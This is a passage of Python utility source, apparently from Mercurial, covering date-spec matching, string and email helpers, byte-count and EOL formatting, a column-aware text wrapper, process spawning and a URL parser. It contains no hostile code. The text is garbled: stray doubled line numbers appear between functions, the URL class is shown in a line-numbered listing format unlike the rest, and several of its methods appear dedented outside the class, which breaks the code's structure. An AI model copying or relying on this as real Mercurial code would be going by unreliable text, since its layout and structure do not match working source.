            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # split only once: a second " to " then ends up in the upper bound
        # and is rejected by the date parser instead of escaping as a raw
        # unpacking ValueError
        a, b = date.split(" to ", 1)
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2212 2212
def stringmatcher(pattern, casesensitive=True):
    """
    Build a matcher from a string with an optional 're:' or 'literal:'
    prefix.

    Returns a (kind, pattern, matcher) tuple where kind is 're' or
    'literal', pattern is the input with a recognized prefix removed, and
    matcher is a callable taking the string to test. A missing or unknown
    prefix means a literal match. An invalid regular expression raises
    error.ParseError.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        regexsrc = pattern[3:]
        reflags = 0 if casesensitive else remod.I
        try:
            compiled = remod.compile(regexsrc, reflags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', regexsrc, compiled.search

    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        return 'literal', pattern, pattern.__eq__

    # fold the pattern once; each candidate is folded when tested
    folded = encoding.lower(pattern)
    return 'literal', pattern, lambda s: folded == encoding.lower(s)
2271 2271
def shortuser(user):
    """Return a short representation of a user name or email address.

    Everything from the first '@' on is dropped, then everything up to and
    including the first '<', then everything from the first space on, and
    finally everything from the first '.' on.
    """
    def upto(text, sep):
        # text before the first occurrence of sep, or all of it
        pos = text.find(sep)
        return text if pos < 0 else text[:pos]

    user = upto(user, '@')
    bracket = user.find('<')
    if bracket >= 0:
        user = user[bracket + 1:]
    return upto(upto(user, ' '), '.')
2287 2287
def emailuser(user):
    """Return the user portion of an email address.

    That is the text before the first '@', with anything up to and
    including a '<' removed from its start.
    """
    at = user.find('@')
    localpart = user if at < 0 else user[:at]
    bracket = localpart.find('<')
    if bracket < 0:
        return localpart
    return localpart[bracket + 1:]
2297 2297
def email(author):
    '''Return the email part of an author string.

    This is the text after the first '<' (or from the start when there is
    none) up to, but not including, the first '>' (or to the end when
    there is none).
    '''
    start = author.find('<') + 1
    close = author.find('>')
    end = close if close != -1 else None
    return author[start:end]
2304 2304
def ellipsis(text, maxlength=400):
    """Trim text to at most maxlength (default: 400) display columns.

    The work is delegated to encoding.trim() with '...' passed as the
    ellipsis marker.
    """
    marker = '...'
    return encoding.trim(text, maxlength, ellipsis=marker)
2308 2308
def unitcountfn(*unittable):
    '''Return a function that renders a readable count of some quantity.

    Each entry of unittable is a (multiplier, divisor, format) tuple. The
    returned function uses the first entry for which the absolute count is
    at least multiplier * divisor, and formats count / divisor with it. If
    no entry qualifies, the raw count is formatted with the last entry's
    format.
    '''

    def go(count):
        magnitude = abs(count)
        for multiplier, divisor, format in unittable:
            if magnitude < divisor * multiplier:
                continue
            return format % (count / float(divisor))
        fallback = unittable[-1][2]
        return fallback % count

    return go
2319 2319
def processlinerange(fromline, toline):
    """Validate the line range <fromline>:<toline> and return it as a
    0-based (start, end) pair.

    Raises error.ParseError if toline is smaller than fromline or if
    fromline is smaller than 1.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    span = toline - fromline
    if span < 0:
        raise error.ParseError(_("line range must be positive"))
    if not fromline >= 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    start = fromline - 1
    return start, toline
2340 2340
# Render a byte count as a human-readable string.
#
# Each row is (multiplier, divisor, format): unitcountfn() picks the first
# row whose multiplier * divisor does not exceed the absolute count and
# formats count / divisor with it. The rows are ordered so that larger
# values are shown with fewer decimals (>= 100 units: none, >= 10 units:
# one, >= 1 unit: two).
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2353 2353
# Matches a single EOL: either a LF, or a CRLF in which any run of
# repeated CRs before the LF is treated as part of the EOL (and is thus
# removed on substitution). We do not care about old Macintosh files, so a
# stray CR (one not followed by LF) is not matched.
_eolre = remod.compile(br'\r*\n')
2358 2358
def tolf(s):
    """Return s with every EOL matched by _eolre replaced by LF."""
    replaceeol = _eolre.sub
    return replaceeol('\n', s)
2361 2361
def tocrlf(s):
    """Return s with every EOL matched by _eolre replaced by CRLF."""
    replaceeol = _eolre.sub
    return replaceeol('\r\n', s)
2364 2364
# Pick the converters between LF and the platform's native EOL: real
# conversion is only needed where the native line separator is CRLF.
if pycompat.oslinesep != '\r\n':
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
else:
    tonativeeol = tocrlf
    fromnativeeol = tolf
2371 2371
def escapestr(s):
    """Return s with special characters backslash-escaped.

    This calls the function underlying s.encode('string_escape') directly
    for Python 3 compatibility.
    """
    escaped, consumed = codecs.escape_encode(s)
    return escaped
2376 2376
def unescapestr(s):
    """Return s with backslash escapes decoded (inverse of escapestr)."""
    decoded, consumed = codecs.escape_decode(s)
    return decoded
2379 2379
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string.

    pycompat.bytestr() is tried first; if that raises UnicodeEncodeError,
    str(obj) is converted with encoding.strtolocal() instead.
    """
    try:
        converted = pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        localtext = encoding.strtolocal(str(obj))
        converted = pycompat.bytestr(localtext)
    return converted
2388 2388
def uirepr(s):
    """Return repr(s) with doubled backslashes collapsed to single ones.

    This avoids showing double backslashes in the repr() of Windows paths.
    """
    quoted = repr(s)
    return quoted.replace('\\\\', '\\')
2392 2392
# delay import of textwrap
def MBTextWrapper(**kwargs):
    """Return a column-width-aware text wrapper built from kwargs.

    The first call defines the wrapper class and rebinds the module-level
    name MBTextWrapper to it, so later calls instantiate the class
    directly instead of running this function again.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires user decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            """Split ucstr into a (head, tail) pair.

            head is the longest prefix whose accumulated
            encoding.ucolwidth() does not exceed space_left; tail is the
            rest ('' when the whole string fits).
            """
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            """Deal with a chunk that is wider than a whole line.

            With break_long_words set, the part of the last chunk that
            fits into the remaining space (at least one column) is moved
            to cur_line and the rest stays on the chunk stack. Otherwise
            the chunk is moved whole, but only onto an empty line.
            """
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            """Assemble chunks into a list of lines no wider than
            self.width, measuring chunks with encoding.ucolwidth().

            chunks is reversed in place and consumed. Raises ValueError
            if self.width is not positive.
            """
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                # (the indent itself is measured with len(), not colwidth)
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # replace this factory function with the class itself for later calls
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2496 2496
def wrap(line, width, initindent='', hangindent=''):
    """Wrap line to width columns and return the result as a byte string.

    initindent prefixes the first output line and hangindent the following
    ones. line and both indents are decoded with encoding.encoding (error
    mode encoding.encodingmode), wrapped with MBTextWrapper, and the
    filled text is encoded back with encoding.encoding.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)

    codec = pycompat.sysstr(encoding.encoding)
    errmode = pycompat.sysstr(encoding.encodingmode)
    line, initindent, hangindent = [
        text.decode(codec, errmode)
        for text in (line, initindent, hangindent)]

    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    filled = wrapper.fill(line)
    return filled.encode(codec)
2512 2512
# iterfile(fp) returns an object to iterate over the lines of fp. Which
# implementation is defined depends on the running interpreter, see below.
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            """Iterate over the lines of fp by calling fp.readline until it
            returns ''."""
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            """Yield the lines of fp, reading its file descriptor directly
            with os.read() in bufsize chunks and retrying on EINTR."""
            fd = fp.fileno()
            # data read so far that does not yet end with a newline
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # incomplete piece, keep it for the next read
                            line = l
                # an empty read means EOF
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return an iterable over the lines of fp.

        fp itself is returned unless it is a plain ``file`` object that
        does not refer to a regular file (S_ISREG); in that case the
        EINTR-safe _safeiterfile() iterator is returned.
        """
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return fp unchanged; it can be iterated directly here."""
        return fp
2584 2584
def iterlines(iterator):
    """Yield every line of every chunk produced by iterator.

    Each chunk is split with splitlines(), so the yielded lines carry no
    line terminators.
    """
    for block in iterator:
        pieces = block.splitlines()
        for piece in pieces:
            yield piece
2589 2589
def expandpath(path):
    """Return path with environment variables expanded first and a leading
    '~' user directory expanded afterwards."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2592 2592
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.

    The result is a list: for a frozen build it has one element, the
    executable path; otherwise it is whatever gethgcmd() returns.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2607 2607
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.

    While waiting, a SIGCHLD handler is installed (where the platform has
    SIGCHLD); the previous handler is restored before returning.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # os.wait() returns a (pid, status) tuple; keep only the pid so
        # that the "pid in terminated" test below can actually match
        terminated.add(os.wait()[0])
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # re-check condfn() after noticing the child is gone: it may
            # have succeeded just before exiting
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # prevhandler is only set when SIGCHLD exists on this platform
        if prevhandler is not None:
            signal.signal(SIGCHLD, prevhandler)
2642 2642
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    mapping maps the text following the prefix to its replacement. Its
    keys are inserted into a regular expression as they are. The mapping
    passed in is never modified.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    alternatives = list(mapping.keys())
    if escape_prefix:
        alternatives.append(prefix)
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # a doubled prefix stands for the prefix itself; add that entry to
        # a private copy so the caller's mapping is left untouched
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    if not alternatives:
        # nothing can be substituted; an empty alternation would match the
        # bare prefix and then fail looking up ''
        return s
    patterns = '|'.join(alternatives)
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    # x.group() is prefix + key; strip the one-character prefix
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667 2667
def getport(port):
    """Return the port for a given network service.

    If port is an integer (or a string holding one), it is returned as an
    integer. Otherwise it is looked up as a service name using
    socket.getservbyname(). If there's no matching service, Abort is
    raised.
    """
    try:
        return int(port)
    except ValueError:
        # not a number, treat it as a service name below
        servicename = port

    try:
        return socket.getservbyname(servicename)
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
2684 2684
# Recognized spellings of boolean values, keyed by their lowercase form
# (parsebool() lowercases its input before looking it up here).
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
             '0': False, 'no': False, 'false': False, 'off': False,
             'never': False}
2688 2688
def parsebool(s):
    """Parse s into a boolean.

    The lookup in _booleans is case-insensitive. If s is not a valid
    boolean, returns None.
    """
    key = s.lower()
    return _booleans.get(key)
2695 2695
# Maps every two-character hex string (both cases of each digit) to the
# character with that code.
_hextochr = {pair: chr(int(pair, 16))
             for pair in (a + b
                          for a in string.hexdigits
                          for b in string.hexdigits)}
2698 2698
2699 2699 class url(object):
2700 2700 r"""Reliable URL parser.
2701 2701
2702 2702 This parses URLs and provides attributes for the following
2703 2703 components:
2704 2704
2705 2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706 2706
2707 2707 Missing components are set to None. The only exception is
2708 2708 fragment, which is set to '' if present but empty.
2709 2709
2710 2710 If parsefragment is False, fragment is included in query. If
2711 2711 parsequery is False, query is included in path. If both are
2712 2712 False, both fragment and query are included in path.
2713 2713
2714 2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715 2715
2716 2716 Note that for backward compatibility reasons, bundle URLs do not
2717 2717 take host names. That means 'bundle://../' has a path of '../'.
2718 2718
2719 2719 Examples:
2720 2720
2721 2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 2725 >>> url(b'file:///home/joe/repo')
2726 2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 2727 >>> url(b'file:///c:/temp/foo/')
2728 2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 2729 >>> url(b'bundle:foo')
2730 2730 <url scheme: 'bundle', path: 'foo'>
2731 2731 >>> url(b'bundle://../foo')
2732 2732 <url scheme: 'bundle', path: '../foo'>
2733 2733 >>> url(br'c:\foo\bar')
2734 2734 <url path: 'c:\\foo\\bar'>
2735 2735 >>> url(br'\\blah\blah\blah')
2736 2736 <url path: '\\\\blah\\blah\\blah'>
2737 2737 >>> url(br'\\blah\blah\blah#baz')
2738 2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 2739 >>> url(br'file:///C:\users\me')
2740 2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741 2741
2742 2742 Authentication credentials:
2743 2743
2744 2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 2746 >>> url(b'ssh://joe@x/repo')
2747 2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748 2748
2749 2749 Query strings and fragments:
2750 2750
2751 2751 >>> url(b'http://host/a?b#c')
2752 2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755 2755
2756 2756 Empty path:
2757 2757
2758 2758 >>> url(b'')
2759 2759 <url path: ''>
2760 2760 >>> url(b'#a')
2761 2761 <url path: '', fragment: 'a'>
2762 2762 >>> url(b'http://host/')
2763 2763 <url scheme: 'http', host: 'host', path: ''>
2764 2764 >>> url(b'http://host/#a')
2765 2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766 2766
2767 2767 Only scheme:
2768 2768
2769 2769 >>> url(b'http:')
2770 2770 <url scheme: 'http'>
2771 2771 """
2772 2772
2773 2773 _safechars = "!~*'()+"
2774 2774 _safepchars = "/!~*'()+:\\"
2775 2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776 2776
2777 2777 def __init__(self, path, parsequery=True, parsefragment=True):
2778 2778 # We slowly chomp away at path until we have only the path left
2779 2779 self.scheme = self.user = self.passwd = self.host = None
2780 2780 self.port = self.path = self.query = self.fragment = None
2781 2781 self._localpath = True
2782 2782 self._hostport = ''
2783 2783 self._origpath = path
2784 2784
2785 2785 if parsefragment and '#' in path:
2786 2786 path, self.fragment = path.split('#', 1)
2787 2787
2788 2788 # special case for Windows drive letters and UNC paths
2789 2789 if hasdriveletter(path) or path.startswith('\\\\'):
2790 2790 self.path = path
2791 2791 return
2792 2792
2793 2793 # For compatibility reasons, we can't handle bundle paths as
2794 2794 # normal URLS
2795 2795 if path.startswith('bundle:'):
2796 2796 self.scheme = 'bundle'
2797 2797 path = path[7:]
2798 2798 if path.startswith('//'):
2799 2799 path = path[2:]
2800 2800 self.path = path
2801 2801 return
2802 2802
2803 2803 if self._matchscheme(path):
2804 2804 parts = path.split(':', 1)
2805 2805 if parts[0]:
2806 2806 self.scheme, path = parts
2807 2807 self._localpath = False
2808 2808
2809 2809 if not path:
2810 2810 path = None
2811 2811 if self._localpath:
2812 2812 self.path = ''
2813 2813 return
2814 2814 else:
2815 2815 if self._localpath:
2816 2816 self.path = path
2817 2817 return
2818 2818
2819 2819 if parsequery and '?' in path:
2820 2820 path, self.query = path.split('?', 1)
2821 2821 if not path:
2822 2822 path = None
2823 2823 if not self.query:
2824 2824 self.query = None
2825 2825
2826 2826 # // is required to specify a host/authority
2827 2827 if path and path.startswith('//'):
2828 2828 parts = path[2:].split('/', 1)
2829 2829 if len(parts) > 1:
2830 2830 self.host, path = parts
2831 2831 else:
2832 2832 self.host = parts[0]
2833 2833 path = None
2834 2834 if not self.host:
2835 2835 self.host = None
2836 2836 # path of file:///d is /d
2837 2837 # path of file:///d:/ is d:/, not /d:/
2838 2838 if path and not hasdriveletter(path):
2839 2839 path = '/' + path
2840 2840
2841 2841 if self.host and '@' in self.host:
2842 2842 self.user, self.host = self.host.rsplit('@', 1)
2843 2843 if ':' in self.user:
2844 2844 self.user, self.passwd = self.user.split(':', 1)
2845 2845 if not self.host:
2846 2846 self.host = None
2847 2847
2848 2848 # Don't split on colons in IPv6 addresses without ports
2849 2849 if (self.host and ':' in self.host and
2850 2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 2851 self._hostport = self.host
2852 2852 self.host, self.port = self.host.rsplit(':', 1)
2853 2853 if not self.host:
2854 2854 self.host = None
2855 2855
2856 2856 if (self.host and self.scheme == 'file' and
2857 2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 2858 raise Abort(_('file:// URLs can only refer to localhost'))
2859 2859
2860 2860 self.path = path
2861 2861
2862 2862 # leave the query string escaped
2863 2863 for a in ('user', 'passwd', 'host', 'port',
2864 2864 'path', 'fragment'):
2865 2865 v = getattr(self, a)
2866 2866 if v is not None:
2867 2867 setattr(self, a, urlreq.unquote(v))
2868 2868
2869 2869 @encoding.strmethod
2870 2870 def __repr__(self):
2871 2871 attrs = []
2872 2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 2873 'query', 'fragment'):
2874 2874 v = getattr(self, a)
2875 2875 if v is not None:
2876 2876 attrs.append('%s: %r' % (a, v))
2877 2877 return '<url %s>' % ', '.join(attrs)
2878 2878
2879 2879 def __bytes__(self):
2880 2880 r"""Join the URL's components back into a URL string.
2881 2881
2882 2882 Examples:
2883 2883
2884 2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 2887 'http://user:pw@host:80/?foo=bar&baz=42'
2888 2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 2891 'ssh://user:pw@[::1]:2200//home/joe#'
2892 2892 >>> bytes(url(b'http://localhost:80//'))
2893 2893 'http://localhost:80//'
2894 2894 >>> bytes(url(b'http://localhost:80/'))
2895 2895 'http://localhost:80/'
2896 2896 >>> bytes(url(b'http://localhost:80'))
2897 2897 'http://localhost:80/'
2898 2898 >>> bytes(url(b'bundle:foo'))
2899 2899 'bundle:foo'
2900 2900 >>> bytes(url(b'bundle://../foo'))
2901 2901 'bundle:../foo'
2902 2902 >>> bytes(url(b'path'))
2903 2903 'path'
2904 2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 2905 'file:///tmp/foo/bar'
2906 2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 2907 'file:///c:/tmp/foo/bar'
2908 2908 >>> print(url(br'bundle:foo\bar'))
2909 2909 bundle:foo\bar
2910 2910 >>> print(url(br'file:///D:\data\hg'))
2911 2911 file:///D:\data\hg
2912 2912 """
2913 2913 if self._localpath:
2914 2914 s = self.path
2915 2915 if self.scheme == 'bundle':
2916 2916 s = 'bundle:' + s
2917 2917 if self.fragment:
2918 2918 s += '#' + self.fragment
2919 2919 return s
2920 2920
2921 2921 s = self.scheme + ':'
2922 2922 if self.user or self.passwd or self.host:
2923 2923 s += '//'
2924 2924 elif self.scheme and (not self.path or self.path.startswith('/')
2925 2925 or hasdriveletter(self.path)):
2926 2926 s += '//'
2927 2927 if hasdriveletter(self.path):
2928 2928 s += '/'
2929 2929 if self.user:
2930 2930 s += urlreq.quote(self.user, safe=self._safechars)
2931 2931 if self.passwd:
2932 2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 2933 if self.user or self.passwd:
2934 2934 s += '@'
2935 2935 if self.host:
2936 2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 2937 s += urlreq.quote(self.host)
2938 2938 else:
2939 2939 s += self.host
2940 2940 if self.port:
2941 2941 s += ':' + urlreq.quote(self.port)
2942 2942 if self.host:
2943 2943 s += '/'
2944 2944 if self.path:
2945 2945 # TODO: similar to the query string, we should not unescape the
2946 2946 # path when we store it, the path might contain '%2f' = '/',
2947 2947 # which we should *not* escape.
2948 2948 s += urlreq.quote(self.path, safe=self._safepchars)
2949 2949 if self.query:
2950 2950 # we store the query in escaped form.
2951 2951 s += '?' + self.query
2952 2952 if self.fragment is not None:
2953 2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 2954 return s
2955 2955
2956 2956 __str__ = encoding.strmethod(__bytes__)
2957 2957
def authinfo(self):
    '''Return ``(url, authdata)`` for this URL.

    ``url`` is the URL rendered with user and password left out.
    ``authdata`` is ``None`` when no user is set; otherwise it is the
    tuple ``(None, (url, host), user, passwd)``, with an empty string
    standing in for a missing password.
    '''
    saveduser, savedpasswd = self.user, self.passwd
    try:
        # blank the credentials only while rendering, then put them back
        self.user = self.passwd = None
        stripped = bytes(self)
    finally:
        self.user, self.passwd = saveduser, savedpasswd
    if self.user:
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (stripped, (None, (stripped, self.host),
                           self.user, self.passwd or ''))
    return (stripped, None)
2973 2973
def isabs(self):
    '''Return True if this URL cannot be joined onto a base path.

    That is the case for any scheme other than ``file``, for paths with
    a drive letter, for Windows UNC paths and for POSIX-style absolute
    paths.
    '''
    scheme = self.scheme
    if scheme and scheme != 'file':
        return True # remote URL
    path = self.path
    if hasdriveletter(path):
        return True # absolute for our purposes - can't be joined()
    # Windows UNC path, or POSIX-style
    return path.startswith(br'\\') or path.startswith('/')
2984 2984
def localpath(self):
    '''Return the local filesystem path this URL refers to.

    For schemes other than ``file`` and ``bundle`` the original,
    unparsed path is returned unchanged.
    '''
    if self.scheme not in ('file', 'bundle'):
        return self._origpath

    path = self.path or '/'
    if hasdriveletter(self._hostport):
        # For Windows, we need to promote hosts containing drive
        # letters to paths with drive letters.
